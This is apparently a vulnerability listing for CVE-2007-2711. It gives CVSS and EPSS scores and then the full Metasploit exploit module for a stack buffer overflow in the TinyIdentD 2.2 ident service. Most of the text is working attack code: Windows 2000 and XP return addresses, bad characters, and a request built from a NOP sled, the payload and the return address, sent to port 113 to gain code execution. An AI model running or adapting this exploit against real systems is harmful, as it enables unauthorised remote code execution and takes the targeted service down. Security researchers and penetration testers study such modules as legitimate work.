CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
Percentile
99.2%
This module exploits a stack based buffer overflow in TinyIdentD version 2.2. If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(
update_info(
info,
'Name' => 'TinyIdentD 2.2 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in TinyIdentD
version 2.2.
If we send a long string to the ident service we can overwrite the
return address and execute arbitrary code. Credit to Maarten Boone.
},
'Author' =>
[
'Maarten Boone', # discovery
'Jacopo Cervini <acaro[at]jervus.it>', # metasploit
],
'References' =>
[
['BID', '23981'],
['CVE', '2007-2711'],
['EDB', '3925'],
['OSVDB', '36053'],
],
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x0d\x20\x0a"
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 Server SP4 - English', { 'Ret' => 0x7c2d15e7 } ], # call esi
['Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
['Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
['Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
['Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
['Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
['Windows XP SP2 - Italian', { 'Ret' => 0x77f46eda } ], # call esi
],
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SERVICE_DOWN ]
},
'Privileged' => false,
'DisclosureDate' => '2007-05-14'
)
)
register_options([ Opt::RPORT(113) ])
end
def exploit
connect
print_status("Trying #{target.name} using address at #{'0x%.8x' % target.ret} ...")
request = "\xeb\x20, 28 : USERID : UNIX :"
request << make_nops(491 - payload.encoded.length)
request << payload.encoded
request << [ target.ret ].pack('V')
request << "\n"
sock.put(request)
handler
disconnect
end
end